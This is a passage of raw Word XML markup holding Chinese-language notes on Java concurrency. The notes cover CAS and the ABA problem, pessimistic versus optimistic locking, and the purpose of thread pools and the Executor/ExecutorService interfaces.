          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，会使程序可读性变差，且难以测试，同时会出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ABA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>问题。</w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="t4"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRPr="003D3504" w:rsidRDefault="00261FD1" w:rsidP="009531FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000921CF" w:rsidRDefault="00A86956" w:rsidP="0083329B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51ACF" w:rsidRDefault="00DA54D7" w:rsidP="0083329B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId185" w:history="1">
        <w:r w:rsidR="004F6722" w:rsidRPr="009970E6">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/aesop_wubo/article/details/7537960</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004F6722" w:rsidRDefault="004F6722" w:rsidP="0083329B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00061AB6" w:rsidRDefault="00061AB6" w:rsidP="0083329B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00014719" w:rsidRPr="00927641" w:rsidRDefault="00014719" w:rsidP="00014719">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.4.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>悲观锁与乐观锁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00061AB6" w:rsidRDefault="00A05992" w:rsidP="00E0792C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041279A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="0041279A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一种悲观锁，它认为在它修改之前，一定会有其它线程去修改它，悲观锁效率很低</w:t>
      </w:r>
      <w:r w:rsidR="001E17C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0023A" w:rsidRPr="00E0792C" w:rsidRDefault="00675253" w:rsidP="00E0792C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r w:rsidR="00C0023A" w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这些类里面大多使用</w:t>
      </w:r>
      <w:r w:rsidR="00C0023A" w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00C0023A" w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidR="00C0023A" w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00C0023A" w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>重试方式的</w:t>
      </w:r>
      <w:r w:rsidR="00C0023A" w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C0023A" w:rsidRPr="00ED6B36">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>乐观锁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6D73" w:rsidRPr="00F41A4C" w:rsidRDefault="005C6D73" w:rsidP="005C6D73">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.5  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>线程池</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2F1C" w:rsidRPr="00F41A4C" w:rsidRDefault="000F5665" w:rsidP="006D2F1C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.5.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>什么是线程池？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2206" w:rsidRPr="00F41A4C" w:rsidRDefault="00537C88" w:rsidP="00FA50CD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>线程创建时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">T1, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>线程执行时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>T2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，线程销毁时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>T3</w:t>
      </w:r>
      <w:r w:rsidR="00E7624B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E7624B" w:rsidRPr="00F41A4C" w:rsidRDefault="00E7624B" w:rsidP="00F14476">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在面向对象编程中，创建和销毁对象是很费时间的，因为创建一个对象要获取内存资源或者其它更多资源。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中更是如此，虚拟机将试图跟踪每一个对象，以便能够在对象销毁后进行垃圾回收。所以提高服务程序效率的一个手段就是尽可能减少创建和销毁对象的次数，特别是一些很耗资源的对象创建和销毁，这就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>池化资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>技术产生的原因。线程池顾名思义就是事先创建若干个可执行的线程放入一个池（容器）中，需要的时候从池中获取线程不用自行创建，使用完毕不需要销毁线程而是放回池中，从而减少创建和销毁线程对象的开销。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>为什么要用线程池</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>减少了创建和销毁线程的次数，每个工作线程都可以被重复利用，可执行多个任务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以根据系统的承受能力，调整线程池中工作线线程的数目，防止因为消耗过多的内存，而把服务器累趴下</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每个线程需要大约</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1MB</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内存，线程开的越多，消耗的内存也就越大，最后死机</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里面线程池的顶级接口是</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Executor</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，但是严格意义上讲</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Executor</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并不是一个线程池，而只是一个执行线程的工具。真正的线程池接口是</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00847415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比较重要的几个类：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2518"/>
        <w:gridCol w:w="6004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847415" w:rsidRPr="00847415" w:rsidTr="00847415">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00847415" w:rsidRPr="00847415" w:rsidRDefault="00847415" w:rsidP="00847415">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="330" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00847415">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>ExecutorService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6004" w:type="dxa"/>
            <w:tcBorders>
